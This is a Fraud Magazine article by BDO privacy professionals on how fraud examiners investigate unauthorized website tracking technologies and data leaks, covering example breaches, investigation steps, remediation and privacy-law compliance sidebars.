The first indication that a retail company had been a victim of a security breach occurred in early 2023 when a customer complained that her account had been changed without her authorization. This incident set into motion an investigation that lasted five months and involved the company’s web development team, information technology and security specialists, and external forensic specialists. Ultimately, the company’s team of investigators determined that the breach hadn’t been caused by ransomware or business email compromise. Instead, investigators found unauthorized tracking technologies on the company’s website that’d been siphoning customers’ personal data to a third-party broker who then sold the data, including customers’ usernames, passwords, purchasing habits and credit card information. According to investigators, a previously undetected coding vulnerability in the company’s system invited the data breach, allowing malicious actors to inject cookies into the company’s website and collect and transfer data to an external database.
In another case last year, during its routine testing of a pharmaceutical company’s website, the web team discovered irregularities in the URL redirect for the company’s webform entries. The web team determined its customers’ information — including sensitive information about usernames, addresses, medications and medical conditions was unintentionally shared with unauthorized parties as submission forms that collect customer information on the website were redirected to an unknown party external to the company.
The investigation took six weeks to resolve as the company’s web team meticulously examined webform code, URL redirects and server logs to trace unauthorized access and detect anomalous patterns. The cause of the company’s breach was an SQL injection attack compounded by a malicious website redirect. This vulnerability enabled threat actors to manipulate the connection between the database containing sensitive information and the location of the website’s forms, redirecting data to unauthorized destinations.
These two cases illustrate the ways that fraudsters gain access to people’s personal and sensitive information through tracking technologies. Fraudsters then use the sensitive data obtained through these tracking technologies to engage in other criminal pursuits, such as identity theft and social engineering scams.
They also illustrate how tracking technologies operate covertly in the background, collecting data without anyone knowing until it’s too late and a company must now contend with unwanted litigation, reputation damage and costly investigations. Many times, these technologies fail to trigger proper notification and consent mechanisms, and malicious scripts embedded in websites and other unauthorized third-party trackers can make intrusions difficult to monitor and remediate. Knowing these technologies exist in the first place can help organizations stay vigilant to protect their customers’ personal and sensitive information. We’ll explain how these technologies track data from websites and mobile applications (aka apps) and provide best practices for investigating suspicious or unauthorized tracking technologies.
Tracking technologies are pieces of code or scripts — such as cookies, pixels, beacons and tags — used to collect and analyze information about how people interact with websites and mobile apps. When an organization creates its own tracking technology, it’s known as “first-party” tracking, but third parties may also use them. Usually, website or app owners maintain domain ownership of the technologies and are responsible for the data collected, even if they use third-party service providers to manage or host sites.
If used responsibly by a company, tracking technologies can be helpful for understanding its customers. But in the wrong hands, they can be used to collect and misuse sensitive data. Tracking technologies used for fraudulent purposes are introduced to a site via scripts or malicious ad networks, and the code is obfuscated to avoid detection. Unintentional data leaks can occur with coding errors and misconfigurations. These mistakes can be traced and corrected, but they’re vulnerabilities that bad actors won’t hesitate to exploit.
As already mentioned, not all tracking technologies are created equal — some, in fact, are integral to digital marketing strategies and serve multiple functions like enhancing a customer’s experience on a website or improving the website’s performance for revenue growth.
When used responsibly, tracking technologies provide companies with deep insights into their customers’ activities. It’s through tracking technologies that companies learn about their customers’ preferences and behaviors. By analyzing data collected by tracking technologies, marketers may create personalized advertising campaigns that can improve engagement with customers, conversion rates and, ultimately, a greater return on investment (ROI).
Businesses often use tracking tech to develop accurate attribution models, which allow them to determine which of their marketing campaigns are most effective and how different touchpoints — or points of contact on a website — contribute to converting users to customers.
Insights from tracking technologies provide valuable data for making strategic decisions. Analyzing user behaviors helps companies identify trends, improve products and improve the design of their websites. They also help companies glean insights into their competitors’ strategies.
Companies might also use tracking technologies to reveal inefficiencies in business processes. By identifying areas where resources are being underutilized or wasted, companies can streamline operations, reduce costs and enhance overall productivity. Data collected through tracking technologies can also help companies forecast trends and behaviors to stay ahead of market changes, optimize inventory management, and tailor their goods or services to meet anticipated demands.
And while the focus of this article is on investigating fraudulent use of tracking technologies, these technologies can actually help detect and prevent fraud. By using tracking technologies to monitor patterns and anomalies in user behavior, companies can identify suspicious activities.
Finally, organizations can also use these technologies to assist them in complying with legal and regulatory requirements. By maintaining detailed logs and records of user interactions through tracking technology, companies may meet industry standards and produce necessary documentation during audits.
This is where tracking technologies veer from useful to harmful. First, for consumers, these technologies encroach on privacy as they collect sensitive personal data such as a person’s location, health information, online-browsing habits and financial details. Poor security practices on a website can lead to identity theft and financial loss if bad actors are able to access this data. Unauthorized tracking technologies often monitor individuals without explicit consent, which erodes trust and creates a sense of constant surveillance. (See sidebar “Consent is critical for collecting personal information,” at the end of this article.) Their use also raises ethical and moral concerns, especially in sectors like law enforcement where surveillance of individuals might be necessary. If used irresponsibly without regard to citizens’ civil rights and liberties, these tracking technologies have the potential to be used for discriminatory practices that disproportionately target certain groups of people.
Bad actors misuse collected data for purposes beyond the original intent, such as using the data for targeted content and political campaigns. Additionally, some employers might use these technologies to excessively monitor employees.
Organizations that depend on tracking technologies also face problems if they fail or malfunction, disrupting work and other critical tasks. Incorrectly implementing these technologies compromises the performance and normal functioning of a website.
Moreover, implementing and maintaining tracking technologies can be costly, and businesses might decide to pass the costs on to their customers by charging more for their goods and services.
In the following sections, we’ll detail what organizations should do if they suspect that tracking technologies are the cause of data leaks.
Even though unauthorized tracking is a specific type of data leak, don’t abandon traditional investigative techniques — use forensically sound, commercially available tools whenever possible. It’s also best practice to hire external forensics professionals if the organization lacks experienced in-house professionals to conduct this type of investigation.
Before diving into any data leak investigation, it’s essential to understand the scope of the data leak. Gathering as much information as possible about the situation early on helps investigators identify the source of the compromise and the extent of the damage that it’s caused. Learning the full scope of the leak requires talking to the in-house digital team and asking detailed questions about the suspected event and knowing the current website or mobile app configurations. Key questions to ask include:
Then, management will need to work with marketing, data analytics and software development teams to gather as much information as possible about how they use tracking technologies. The investigation may require collecting and analyzing network packets, log files and tag managers.
When there’s a suspected data leak, organizations must consider regulations and compliance requirements. If an organization does business within the European Union (EU) it’ll need to follow reporting mandates set by the EU’s General Data Protection Regulation (EU GDPR). Entities operating in the U.S. must evaluate the breach notification protocols and thresholds that trigger mandatory disclosure to affected parties and regulatory bodies. (For more information about the EU’s GDPR, see the sidebar “Consent is critical for collecting personal information,” at the end of this article.)
While it might not be feasible to report an incident immediately, it’s vital to know the timelines and obligations necessary to fulfill compliance requirements. Organizations should maintain a comprehensive privacy-incident checklist to cover all aspects of their compliance and reporting procedures. (For more information about regulations and compliance regarding tracking technologies, see the sidebar “Compliance obligations,” at the end of this article.)
Once management has made a full inventory of the event and its compliance requirements, it’s time to start collecting data. In many situations, companies may remove unauthorized trackers as soon as possible, but doing so means that investigators will have to recreate those trackers. To recreate these trackers, investigators may collect an archived version of the affected website or app via the Wayback Machine, then utilize a sandbox environment (a test environment) for safe analysis of the unauthorized trackers.
Fraud examiners with training in digital forensics and experience conducting these types of investigations may archive a copy of the website before the trackers are removed from the site. It may be possible to forensically replicate or collect the archived version of the website before analyzing it in a test environment.
Finally, if the website remains live and the unwanted tracking technologies are still active, investigators will need to preserve a copy of the site or necessary pages, then strip out unwanted tracking technologies from the live site.
Regardless of the method you choose, remember to work in an offline environment while conducting the analysis. Remediate the site and collect necessary log files in a forensically sound manner.
Investigators must scrutinize the website in question with the help of the following tools.
Browser tools: Browser developer tools can provide a detailed inspection mechanism for analyzing the elements on a webpage. They help investigators review the site for security warnings about nonsecure origins or requests. Furthermore, examiners can use these tools to identify and document suspicious tracking activities, which may involve unauthorized data collection or malicious scripts, to more comprehensively scrutinize the website’s behavior.
Scanning tools: Regular use of automated scanning tools can help identify and analyze hidden tracking technologies, such as cookies, scripts and web beacons.
Manual analysis and website inspection: Manual analysis of tracking scripts and identifying known tracking domains and scripts that collect user data are critical to the investigation. These procedures can uncover hidden methods of data collection that routine inspections might miss. They’re often written in JavaScript and embedded in a website to collect data on how an individual spends their time on a digital platform — what they click on, how much time they spend there, what they browse, their location and preferences. Manual analysis can determine what data was collected or exfiltrated from the platform.
To manually analyze scripts, first inspect the website’s source code using developer website tools. Search for external scripts or embedded code from third parties, including analytics, ad networks or social media plugins. Then, review the code line by line to understand its functionality, such as how the data was collected, how it communicated with servers, and how the site is using cookies or tracking technologies. Tools like Wireshark or Fiddler monitor network requests made by the scripts.
Next, test the scripts using different scenarios to observe their behavior. In a sandbox environment, investigators will simulate user interactions or use tools that simulate a user’s journey. This is where an investigator might check that a script is respecting privacy settings like “do not track” requests. Simultaneously, the investigator researches the scripts by reviewing privacy policies and terms of service of the entities to determine whether the tracking technologies are acting appropriately. Throughout this process, the investigator documents findings and identifies data privacy, ethical or noncompliance issues.
By analyzing these elements, fraud examiners can uncover unauthorized tracking technologies embedded within a website’s source code. This process may pinpoint data leak origins and reveal how user data is being collected, stored and potentially misused. Identifying these scripts and domains can also highlight breaches in compliance with privacy regulations and help leak investigators introduce corrective measures to safeguard user information, such as encrypting cookie data to add a layer of security, limiting the cookie lifespan so that they expire quickly to minimize the amount of time that bad actors have to exploit them reduce the time in which they could be exploited, and obtaining consent so that users may manage their cookies settings.
Once investigators have collected data, they may turn to the work of identifying the source of the leak. These steps are critical to the process:
During this step of the investigation, collaboration with the organization’s digital and marketing professionals is key. Data leaks aren’t always the result of malicious activity. Sometimes they occur because of coding or management mistakes. Because mistakes can create vulnerabilities, it’s imperative to have detailed discussions with website development teams to untangle what happened. An organization’s web team should be able to explain the website architecture, coding practices and security measures to help pinpoint vulnerabilities that might’ve led to the leak.
Marketing and digital teams may offer insight into authorized tracking technologies and their intended purposes, as well as the nature of the data collected, storage practices and any third-party integrations. These teams may provide insights into user-behavior patterns, which could help determine the extent of the leak.
This step requires examining system logs and network traffic to identify how these unauthorized trackers accessed the site. System logs record all activities within the network, providing invaluable information to isolate anomalous behaviors or unauthorized access attempts. When warranted, investigators should capture network traffic to scrutinize data packets and trace the flow of data within the network.
We recommend capturing network traffic whenever a data leak is suspected; however, this isn’t always realistic. The following factors can help determine whether it’s necessary to capture network traffic:
If system logs or monitoring tools indicate anomalous activity, such as unauthorized access attempts or irregular patterns within the network, capturing traffic can help identify the source, nature and scope of the intrusion.
If there are indications that sensitive website data, such as cookies or user information, is being leaked, analyzing network traffic can help identify the pathways and mechanisms through which the leakage is occurring. This includes identifying whether third-party trackers or scripts are improperly accessing or transmitting data.
If the website is experiencing performance issues, monitoring network traffic can determine whether there are bottlenecks or misconfigurations that are leaving the organization’s site vulnerable.
Understanding the impact of the data leak is essential to remediate the problem. To that end, investigative teams should work closely with the organization’s legal team to categorize the type of data compromised, distinguishing between personal, financial, health or other sensitive information. Identifying the types of data affected by the leak allows organizations to determine potential victims of the leaks. It’s good practice to run through a variety of scenarios to consider how bad actors could exploit data, such as stealing people’s identities or perpetrating a health care fraud scheme from misdirected prescriptions or unauthorized access to financial resources. A thorough assessment of both immediate and long-term ramifications on user privacy and security is imperative, including evaluating the likelihood of malicious entities creating fraudulent accounts to procure goods and services or orchestrating a full-scale identity theft operation.
The fallout from a data leak can be catastrophic for organizations — and not just because of financial losses. When sensitive, personal information is a concern, a company’s reputation and customer trust is on the line. Organizations must also consider the various financial, legal and public consequences that can arise from these data leakage incidents.
Website and mobile app data leaks pose a significant risk to companies of all sizes. Companies must take a comprehensive approach to mitigate the risks of leaks, including technical, administrative and physical measures, and conduct ongoing monitoring to address deficiencies before they become larger problems.
Companies should implement technical measures, including encryption, regular security updates, access controls and secure coding practices as outlined in Security by Design and by Default protocols. In this protocol, security is integrated into the design and development of systems from the start. Common principles are proactive security measures (e.g., encryption, access controls, monitoring), and threat modeling to identify potential vulnerabilities to mitigate risk early in the design process, and comprehensive protection (e.g., network, application, data layers). Additionally, privacy practices should be implemented through data protection by design and by default, which focuses on privacy and data protection before a product, service or system is designed.
Organizations should implement administrative measures that include training for software development and marketing professionals, as well as other measures such as policies, checklists, backup and recovery plans, and thorough third-party risk management practices.
Physical security should include data center and hardware security. Security teams should deploy advanced access control systems using biometric authentication, such as fingerprint or retinal scans, and install high-resolution surveillance cameras for continuous monitoring of data centers. Additionally, trained security personnel should patrol and monitor the premises for enhanced security and rapid response to suspicious activities.
Notification protocols are another important aspect of mitigating future risk. Security teams should include website data leaks in the incident response plan and identify the individuals who need to be part of the response plan. For example, marketing and digital teams often have intricate knowledge of a company’s online experience and are well-suited to response teams.
If there's a data leak, it’s essential to inform individuals who are directly affected as well as any regulatory authorities as required by law. Timely notification helps mitigate damage and maintain transparency.
Website and mobile app data leaks can significantly damage reputation, erode customer trust, and lead to decreased revenue and long-term business threats. Companies can mitigate these problems by implementing proper coding techniques, monitoring and data protection controls. Should a breach occur, organizations should follow proven investigative techniques to identify the root cause of the leak and implement sound data protection controls to avoid future risks.
Karen Schuler, CFE, FIP, is a BDO principal and the global head of privacy and data protection with 30 years of experience as an investigator and privacy professional. Contact her at kschuler@bdo.com.
Taryn Crane, FIP, is a BDO managing director and the U.S. head of privacy and data protection with 15 years of experience as a privacy and marketing technology compliance professional. Contact her at tcrane@bdo.com.
In a 2022 study, researchers crawled 2.8 million pages from 100,000 websites and found that as many as 1,844 European pages and 2,950 American pages allowed trackers to capture email addresses before form submissions. In this study, website visitors entered their email addresses into online forms, which were later collected by unauthorized third parties. Unauthorized collection of email addresses violates user privacy, as it involves gathering personal information without consent. Unauthorized collection of email addresses also increases the risk of data breaches and identity theft, as hackers may further exploit unauthorized data by exposing users to phishing attacks and other malicious activities.
Providing notice and obtaining explicit or implicit consent are critical components for organizations to determine whether they can collect certain types of information from users. In the U.S., courts have endorsed the practice of websites notifying visitors of their rights and providing the opportunity to accept or decline different types of tracking technologies. In recent years, regulators and plaintiffs’ attorneys have sued companies that failed to adequately inform visitors of their data privacy rights. Regulated entities in the U.S. can use or disclose protected health information without an individual’s written authorization, only as expressly permitted or required by the Health Insurance Portability and Accountability Act (HIPAA).
The European Union’s (EU) General Data Protection Regulation (GDPR) requires that all websites obtain explicit and informed-user consent before deploying nonessential cookies or trackers. Websites must have detailed information about the type of data collected and its purpose, and third-party access must be disclosed. Users may withdraw consent at any time. According to the U.K. Information Commissioner’s Office, sites only need to tell people the cookies are there, explain what the cookie does and offer an explicit opt-in. The EU ePrivacy Directive requires that websites secure user consent before using cookies, except for those strictly necessary for website functionality. Websites must have clear and accessible banners to inform customers about cookie usage and the ability to seek consent.
Multiple laws and regulations drive tracking-technology compliance and prompt companies to investigate unauthorized data sharing and data leakage. These laws and regulations span multiple sectors, agencies and regulators around the world. For example, in 2020, the French data protection authority (CNIL) fined Google LLC 60 million euros (approx. $68 million) and Google Ireland 40 million euros (approx. $46 million) for unauthorized data sharing. Additionally, CNIL fined Amazon Europe Core 35 million euros (approx. $40 million) for violating the ePrivacy Directive, which requires the communications sector to comply with certain website compliance obligations. In January 2023, CNIL fined TikTok 5 million euros (approx. $5.7 million) for failing to provide an easy cookie refusal option and sufficient transparency regarding their purposes in violation of French data protection laws.
Unlock full access to Fraud Magazine and explore in-depth articles on the latest trends in fraud prevention and detection.
Read Time: 5 mins
Written By:
Mandy Moody, CFE
Read Time: 6 mins
Written By:
Robert E. Holtfreter, Ph.D., CFE
Read Time: 5 mins
Written By:
Sandra Damijan, Ph.D., CFE
Read Time: 5 mins
Written By:
Mandy Moody, CFE
Read Time: 6 mins
Written By:
Robert E. Holtfreter, Ph.D., CFE
Read Time: 5 mins
Written By:
Sandra Damijan, Ph.D., CFE
